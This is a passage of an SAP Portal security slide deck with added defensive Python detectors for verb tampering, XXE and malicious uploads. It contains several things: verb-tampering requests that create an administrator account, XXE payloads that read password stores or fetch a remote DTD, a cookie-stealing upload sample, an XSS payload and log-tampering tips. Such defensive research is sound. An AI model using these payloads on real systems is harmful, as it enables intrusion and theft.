HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB
• Add the user ITWEB to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators
Works when UME uses the Java database
31. Verb Tampering: Prevention
• Install SAP Notes 1503579, 1616259
• Install other SAP Notes about verb tampering
• Scan applications with ERPScan WEB.XML checker
• Disable the applications that are not necessary
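The root cause behind the HEAD trick is a web.xml whose security-constraint enumerates the verbs it protects: only the listed http-methods are guarded, so anything else reaches the servlet unauthenticated. The checker below is an added example and not the ERPScan WEB.XML checker; it emulates that one check and shows the fix (drop the http-method elements so the constraint covers every verb). SAMPLE_WEB_XML is constructed; the servlet class and role name are placeholders.

```python
"""Find security-constraints that leave verbs unprotected (added example)."""
import xml.etree.ElementTree as ET

ALL_VERBS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")

# Constructed web.xml: the constraint lists GET and POST only.
SAMPLE_WEB_XML = """\
<web-app>
  <servlet>
    <servlet-name>ConfigServlet</servlet-name>
    <servlet-class>com.example.ctc.ConfigServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>ConfigServlet</servlet-name>
    <url-pattern>/ConfigServlet</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Admin</web-resource-name>
      <url-pattern>/ConfigServlet</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrators</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Tag name without a namespace prefix, so namespaced web.xml files work too."""
    return tag.rsplit("}", 1)[-1]


def _children(el, name):
    return [c for c in el if _local(c.tag) == name]


def check_verb_tampering(web_xml):
    """One finding per web-resource-collection that enumerates http-methods:
    the verbs it does not list are reachable without the auth-constraint."""
    root = ET.fromstring(web_xml)
    findings = []
    for sc in [el for el in root.iter() if _local(el.tag) == "security-constraint"]:
        for wrc in _children(sc, "web-resource-collection"):
            methods = {m.text.strip().upper() for m in _children(wrc, "http-method")}
            if not methods:          # no enumeration: every verb is covered
                continue
            findings.append({
                "patterns": [p.text.strip() for p in _children(wrc, "url-pattern")],
                "listed": sorted(methods),
                "unprotected": [v for v in ALL_VERBS if v not in methods],
            })
    return findings


def harden(web_xml):
    """Remove every http-method element so each constraint applies to all verbs.
    Returns the rewritten XML and the number of elements removed."""
    root = ET.fromstring(web_xml)
    removed = 0
    wrcs = [el for el in root.iter() if _local(el.tag) == "web-resource-collection"]
    for wrc in wrcs:
        for m in _children(wrc, "http-method"):
            wrc.remove(m)
            removed += 1
    return ET.tostring(root, encoding="unicode"), removed


if __name__ == "__main__":
    for f in check_verb_tampering(SAMPLE_WEB_XML):
        print("%s protects %s only; unprotected: %s" % (f["patterns"], f["listed"], f["unprotected"]))
    fixed, n = harden(SAMPLE_WEB_XML)
    print("removed %d http-method elements, remaining findings: %s" % (n, check_verb_tampering(fixed)))
```

Run it over every web.xml deployed on the engine (the slides' advice is to scan all applications, not just ctc); a clean result still does not replace the SAP Notes, since the fix for the shipped applications has to come with the patch.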
32. Verb Tampering: Forensics
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0
Note the pattern: the GET to /ctc/ConfigServlet is rejected with 401, while the HEAD to the same servlet a few minutes later from the same address succeeds with 200 and an empty body.
36. Invoker servlet: Prevention
• Update to the latest patch: SAP Notes 1467771, 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files with ERPScan WEB.XML checker
37. Anti-forensics for simple attacks
• Overwrite the log file with trash requests
• Disable logs (needs a server restart)
• Delete logs (not so easy)
* There should be a separate place for logs, to prevent modifications and to detect these types of attacks
38. Advanced attacks
• CSRF in Web Dynpro Java
• XXE in Portal
• Malicious upload in Portal
* They all need additional analysis, like enabling POST data logging or indirect signs
39. Advanced attacks: Web Dynpro Java
• Web Dynpro unauthorized modifications
• For example:
 - somebody steals an account using XSS/CSRF/sniffing
 - then tries to modify the severity level of logs
41. Advanced attacks: Web Dynpro Java
• No traces of the change in default log files: \cluster\server0\log\system\httpaccess\responses.log
• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
• But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
• The client loaded images from the server during some changes
42. Web Dynpro Java: Forensics
• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don't have them, so they make requests to the server
• That's how we can identify potentially malicious actions
• But there should be correlation with a real user's activity
• False positives are possible:
 - New legitimate user
 - Old user clears cache
 - Other
43. XXE in Portal: Details
• Injection of malicious requests into XML packets
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of a POST request
• It is possible to read any file from the OS, and much more
47. XXE in Portal: Result
• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
 \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
48. XXE in Portal: Prevention
• Install SAP Note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
50. XXE in Portal: Forensics
• The only way to get HTTP POST request values is to enable HTTP Trace.
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable.
 - For 6.4 and 7.0 SP12 and lower:
  o On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
  o On Server: j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
 - For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• And then you need to manually analyze all requests to see whether there are any XXE attacks.
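Manual review of a full HTTP trace does not scale, but the XXE payloads themselves are easy to recognise in a POST body: a DOCTYPE with an external entity (file: for reads, http: for SSRF and out-of-band DTDs), a parameter entity, or entities that expand each other (DoS). The script below is an added example, not code from the slides: the trace layout it parses (request line, a "Client:" header, a blank line, the body, a "----" separator) and the portal URL are assumptions to adapt to the real req_resp.trc, and the four traced requests are constructed.

```python
"""Flag XXE payloads in traced HTTP POST bodies (added example)."""
import re

# Constructed trace: file-read XXE, benign XML, out-of-band parameter entity, entity expansion.
TRACE_SAMPLE = """\
POST /irj/servlet/prt/portal/prtroot/com.sap.portal.example HTTP/1.1
Client: 192.168.192.14
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///usr/sap/EP1/SYS/global/security/data/SecStore.properties"> ]>
<request><name>&xxe;</name></request>
----
POST /irj/servlet/prt/portal/prtroot/com.sap.portal.example HTTP/1.1
Client: 10.0.0.5
Content-Type: text/xml

<?xml version="1.0"?>
<request><name>quarterly report</name></request>
----
POST /irj/servlet/prt/portal/prtroot/com.sap.portal.example HTTP/1.1
Client: 192.168.192.14
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://10.10.0.3:8000/evil.dtd"> %dtd; ]>
<request/>
----
POST /irj/servlet/prt/portal/prtroot/com.sap.portal.example HTTP/1.1
Client: 192.168.192.14
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
----
"""

# One entity declaration: optional "%" (parameter entity), name, then either
# SYSTEM/PUBLIC with a URI or a quoted internal value.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>\w+)\s+'
    r'(?:(?P<kind>SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"'
    r'|"(?P<value>[^"]*)")',
    re.I,
)


def parse_trace(text):
    """Split the (assumed) trace layout into request dicts."""
    requests = []
    for chunk in text.split("\n----"):
        chunk = chunk.strip()
        if not chunk:
            continue
        head, _, body = chunk.partition("\n\n")
        lines = head.splitlines()
        m = re.match(r"(\w+)\s+(\S+)\s+HTTP/", lines[0])
        if not m:
            continue
        headers = {k.strip().lower(): v.strip()
                   for k, _, v in (h.partition(":") for h in lines[1:])}
        requests.append({"method": m.group(1), "url": m.group(2),
                         "client": headers.get("client", "?"), "body": body})
    return requests


def analyze_body(body):
    """Return the XXE indicators found in one XML body (sorted list)."""
    indicators = set()
    if re.search(r"<!DOCTYPE\b", body, re.I):
        indicators.add("doctype")
    for d in ENTITY_RE.finditer(body):
        if d.group("param"):
            indicators.add("parameter-entity")
        if d.group("kind"):
            indicators.add("external-entity")
            scheme = d.group("uri").split(":", 1)[0].lower()
            if scheme in ("file", "jar", "netdoc"):
                indicators.add("file-read")
            elif scheme in ("http", "https", "ftp", "gopher"):
                indicators.add("out-of-band")
        elif d.group("value") and re.search(r"&\w+;", d.group("value")):
            indicators.add("entity-expansion")
    return sorted(indicators)


def find_xxe(text):
    """Requests whose body shows more than a bare DOCTYPE (a plain <!DOCTYPE html> is not an attack)."""
    findings = []
    for req in parse_trace(text):
        ind = analyze_body(req["body"])
        if any(i != "doctype" for i in ind):
            findings.append({"client": req["client"], "url": req["url"], "indicators": ind})
    return findings


if __name__ == "__main__":
    for f in find_xxe(TRACE_SAMPLE):
        print(f["client"], f["url"], ", ".join(f["indicators"]))
```

The file: indicator pointing at SecStore.properties is exactly the case from the previous slides; an http: target in a parameter entity means the engine was used as an SSRF pivot into the corporate LAN, which is the post-exploitation scenario at the end of the deck.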
51. Malicious file upload: Attack
• Knowledge Management allows uploading different types of files to the server, and those files can carry malicious content
• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that steals cookies
54. Malicious file upload: Forensics
• [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
• [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
• *Again, images can help us: the POST to the KM documents explorer does not show what was uploaded, but the html.gif MIME-type icon fetched one second later from the same client shows that an HTML file appeared in the listing.
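The three forensics slides above (verb tampering on slide 32, the Web Dynpro icon on slide 41/42, and the KM upload here) all reduce to rules over the same responses.log line format, so one parser can serve them all. The script below is an added example and not from the slides; SAMPLE_LINES are the lines quoted on those slides plus one constructed benign request, and the admin-servlet and sensitive-component lists are assumptions to extend for your landscape.

```python
"""Three detection rules over the SAP J2EE HTTP access log (added example)."""
import re
from datetime import datetime, timedelta

# "[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790"
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s*-\s*(?P<ip>[\d.]+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)$"
)

ADMIN_SERVLETS = ("/ctc/ConfigServlet",)                      # slide 30; assumption: extend
SENSITIVE_WD_COMPONENTS = ("tc~lm~webadmin~log_config~wd",)   # slide 41: Log Configurator UI
KM_MIME_ICON_RE = re.compile(r"^/irj/go/km/docs/etc/public/mimes/images/(\w+)\.gif$")
KM_UPLOAD_WINDOW = timedelta(seconds=60)                      # assumption

SAMPLE_LINES = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 10, 2013 2:40:00 AM ] - 10.1.1.7 : GET /irj/portal HTTP/1.1 200 4210
"""


def parse_line(line):
    """One access-log line to a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"].strip(), "%b %d, %Y %I:%M:%S %p")
    d["status"] = int(d["status"])
    d["size"] = int(d["size"])
    d["path"] = d["url"].split("?", 1)[0]
    return d


def analyze(lines):
    """Apply the three rules in file order; returns a list of alert dicts."""
    events = [e for e in map(parse_line, lines) if e]
    alerts, denied, last_km_post = [], set(), {}
    for e in events:
        ip, path = e["ip"], e["path"]
        if e["status"] == 401:
            denied.add((ip, path))
        # Rule 1 (slide 32): a verb other than GET/POST succeeds on an admin servlet.
        if path.startswith(ADMIN_SERVLETS) and e["method"] not in ("GET", "POST") \
                and 200 <= e["status"] < 300:
            rule = "verb-tampering"
            if (ip, path) in denied:
                rule += " (earlier 401 on same path)"
            alerts.append({"ip": ip, "rule": rule, "detail": e["url"]})
        # Rule 2 (slides 41/42): an icon of a sensitive Web Dynpro component was
        # fetched, i.e. someone without it in cache used that admin UI.
        if e["method"] == "GET" and path.startswith("/webdynpro/resources/") \
                and path.endswith((".gif", ".png")) \
                and any(c in path for c in SENSITIVE_WD_COMPONENTS):
            alerts.append({"ip": ip, "rule": "admin-ui-icon-loaded", "detail": path})
        # Rule 3 (slide 54): POST to the KM documents explorer followed shortly by
        # a MIME-type icon from the same client reveals the uploaded file type.
        if e["method"] == "POST" and "com.sap.km." in path and path.endswith("/documents"):
            last_km_post[ip] = e["ts"]
        icon = KM_MIME_ICON_RE.match(path)
        if icon and ip in last_km_post \
                and timedelta(0) <= e["ts"] - last_km_post[ip] <= KM_UPLOAD_WINDOW:
            alerts.append({"ip": ip, "rule": "km-upload:" + icon.group(1), "detail": path})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LINES.splitlines()):
        print(a["ip"], a["rule"], a["detail"])
```

Rule 2 is the noisy one, for the reasons slide 42 lists (new users, cleared caches), so treat its hits as something to correlate with the user's other activity rather than as an alert on its own; rules 1 and 3 are precise enough to page on.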
55. Malicious file upload: Prevention
• Enable File Extension and Size Filter.
 - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
 - You must select either the All Repositories parameter or at least one repository from the repository list in the Repositories parameter. Otherwise, the filter is not created.
• Enable Malicious Script Filter.
 - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
 - The filter also detects executable scripts in files that are being modified and encodes them when they are saved.
  o Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied.
  o Enable the Send E-Mail to Administrator option.
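To see what the two filters actually do to an upload, the script below emulates them: an extension/size check that rejects the file, and a "forbidden scripts" filter that, as the slide describes, keeps the file but HTML-encodes the banned tags so they no longer execute, and flags the event for the administrator mail. This is an added example and not SAP's KM implementation; the allowlist, size limit and tag list are assumptions, and HTML_SAMPLE is a constructed cookie-stealing page of the kind slide 51 describes.

```python
"""Emulation of the KM extension/size filter and malicious script filter (added example)."""
import html
import re

ALLOWED_EXTENSIONS = {"pdf", "txt", "png", "jpg", "html"}   # assumption; html kept to show the script filter
MAX_SIZE = 5 * 1024 * 1024                                   # assumption: 5 MiB
FORBIDDEN_SCRIPTS = "script,object,embed,iframe"             # comma-separated, like the KM parameter

# Constructed upload: a page that ships the visitor's cookie to an attacker host.
HTML_SAMPLE = (
    "<html><body><h1>Q1 figures</h1>"
    "<script>new Image().src='http://10.10.0.3/c?'+document.cookie;</script>"
    "</body></html>"
)


def extension_and_size_filter(filename, content):
    """(accepted, reason) for the File Extension and Size Filter."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension '%s' not allowed" % ext
    size = len(content.encode("utf-8"))
    if size > MAX_SIZE:
        return False, "size %d exceeds limit %d" % (size, MAX_SIZE)
    return True, "ok"


def _tag_pattern(forbidden):
    """Opening and closing tags of every name in the comma-separated list."""
    names = [n.strip() for n in forbidden.split(",") if n.strip()]
    return re.compile(r"<\s*/?\s*(?:%s)\b[^>]*>" % "|".join(map(re.escape, names)), re.I)


def malicious_script_filter(content, forbidden=FORBIDDEN_SCRIPTS):
    """Return (content with banned tags entity-encoded, number of tags encoded).
    The script body survives as plain text; only the tags are neutralised."""
    hits = 0

    def encode(m):
        nonlocal hits
        hits += 1
        return html.escape(m.group(0), quote=False)   # "<script>" -> "&lt;script&gt;"

    return _tag_pattern(forbidden).sub(encode, content), hits


def check_upload(filename, content):
    """Run both filters the way the repository would on save."""
    ok, reason = extension_and_size_filter(filename, content)
    if not ok:
        return {"accepted": False, "reason": reason, "content": None,
                "encoded_tags": 0, "notify_admin": False}
    encoded, hits = malicious_script_filter(content)
    return {"accepted": True, "reason": reason, "content": encoded,
            "encoded_tags": hits, "notify_admin": hits > 0}   # Send E-Mail to Administrator


if __name__ == "__main__":
    for name, data in (("q1.html", HTML_SAMPLE), ("tool.exe", "MZ")):
        r = check_upload(name, data)
        print(name, r["accepted"], r["reason"], r["encoded_tags"], r["notify_admin"])
```

Note that a tag list only catches tags: a payload carried in an event-handler attribute (onload=, onerror=) of a permitted element is not in this list, so check what your Forbidden Scripts configuration actually covers and keep the extension filter as the first line, since a repository that never accepts .html needs the script filter far less.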
56. Filtering EPCF in XSS
• EPCF provides a JavaScript API for client-side communication between the Portal components and the Portal core framework
• EPCM (Enterprise Portal Client Manager)
• iViews can access the EPCM object from every page
• Every iView contains the EPCM object
• For example, EPCF is used to transmit the user data buffer for iViews
• <SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects","person"));</SCRIPT>
57. Advanced attacks: Anti-forensics
• If full tracing is enabled, it can degrade performance
• It can also fill up the whole storage volume
• If an attacker wants to spam the logs with trash values, he can do it much faster than with plain GET logs
58. Securing SAP Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Correlation of security events
59. Portal post-exploitation
And one more thing:
• Portal has connections with a lot of systems in the corporate LAN
• Using SSRF, attackers can get access to these systems
60. SSRF attacks
[Diagram: (A) direct attack from the Internet, GET /vuln.jsp against the HTTP server; (B) SSRF attack relayed through the Portal into the corporate network, Get /vuln.jst]
62. Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
SAP Guides
It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
63. Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• May 21 – Training at AusCert (Gold Coast, Australia)
• June 5-6 – Presentation at RSA (Marina Bay Sands, Singapore)
• September 10-12 – BlackHat Trainings (Istanbul, Turkey)